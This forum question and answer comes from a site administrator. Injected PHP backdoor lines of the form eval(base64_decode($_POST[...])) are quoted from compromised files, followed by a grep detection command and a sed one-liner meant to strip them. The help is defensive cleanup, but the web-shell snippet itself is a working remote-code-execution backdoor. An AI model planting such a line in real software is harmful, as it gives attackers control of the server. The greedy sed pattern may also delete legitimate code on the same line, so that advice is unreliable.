# remove eval base64_decode from file with ssh

Tags: linux, ssh, centos

I found several php-files on the webserver(CentOs with WHM) that contain something like this:

```
eval(base64_decode($_POST['n23fcad']));?><?php
```

or

```
eval(base64_decode($_POST['n56660d']));?><?php
```

And so on.

Can I remove this part of code from the php-file, leaving the rest of the file intact?

For now I'm using the following line to detect the files:

```
grep -lr --include=*.php "eval(base64_decode" .
```

I don't know how to delete the malicious part.
As you can see between the brackets of POST the code changes.
So hopefully there is a way to delete these kind of lines.

Thanks in advance!

Answer (score 0):

Please try the following method

```
cat injected_file.php | sed  's/<?php.*eval.*]));?>//g' > good_file.php
```

it works for me.